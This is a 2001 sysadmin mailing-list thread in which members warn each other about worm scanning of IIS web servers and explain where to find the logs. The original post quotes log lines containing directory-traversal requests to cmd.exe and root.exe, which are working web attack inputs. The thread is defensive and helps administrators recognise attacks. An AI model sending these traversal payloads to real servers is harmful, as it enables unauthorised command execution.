To review the logfiles on your server, look under \WINNT\SYSTEM32\LogFiles
and probably W3svc1 or something similar. That's the folder holding most log
files. Look for anything created today and make sure you open it with some
reader that doesn't lock the file from being written by other applications.
It'll keep being updated if you're reviewing it.
Feel free to contact me directly if you need more help.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: Laura Swartout [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:47 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
I'm new to IS admin. What logs should I be looking at? I apply all security
patches as they come out so I was not hit by CodeRed.
-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
Here is a site that has been hit
http://216.39.178.32
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
CodeRed seems to have dwindled to nothing on my logs. But it's being
replaced with the EXACT same lines you have below, and they stay
consistent with the code red 2 methods of attacking the more local
subnets.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert
Yes. It seems to be systems I have previously monitored hitting me with
codered attacks. I bet someone is activating all of their children.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert
All my public facing web servers at home and at my office have shown a
huge continuous hacking activity. Has anyone seen similar? I fear this
may be code red related or automated. Please comment if you have seen
similar. Here is an excerpt from one logfile:
63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á�../..Á�../..Á�../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/..Á�../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107,
-, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3,
GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01,
10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á�../..Á�../..Á�../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15,
97, 604, 404, 3, GET, /scripts/..Á�../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -,
9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET,
/scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:28,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á�../..Á�../..Á�../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET,
/MSADC/root.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x,
0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á�../..Á�../..Á�../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /scripts/..Á�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.114.34.130, -, 9/18/01, 10:39:45,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted with it are the
property of Lanco International and/or its affiliates, are confidential,
and are intended solely for the use of the individual or entity to whom
this e-mail is addressed. If you are not one of the named recipient(s)
or otherwise have reason to believe that you have received this message
in error, please notify the sender at the above e-mail address and
delete this message immediately from your computer. Any other use,
retention, dissemination, forwarding, printing or copying of this e-mail
is strictly prohibited.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted with it are the
property of Lanco International and/or its affiliates, are confidential,
and are intended solely for the use of the individual or entity to whom
this e-mail is addressed. If you are not one of the named recipient(s)
or otherwise have reason to believe that you have received this message
in error, please notify the sender at the above e-mail address and
delete this message immediately from your computer. Any other use,
retention, dissemination, forwarding, printing or copying of this e-mail
is strictly prohibited.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted with it are the
property of Lanco International and/or its affiliates, are confidential, and
are intended solely for the use of the individual or entity to whom this
e-mail is addressed. If you are not one of the named recipient(s) or
otherwise have reason to believe that you have received this message in
error, please notify the sender at the above e-mail address and delete this
message immediately from your computer. Any other use, retention,
dissemination, forwarding, printing or copying of this e-mail is strictly
prohibited.
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
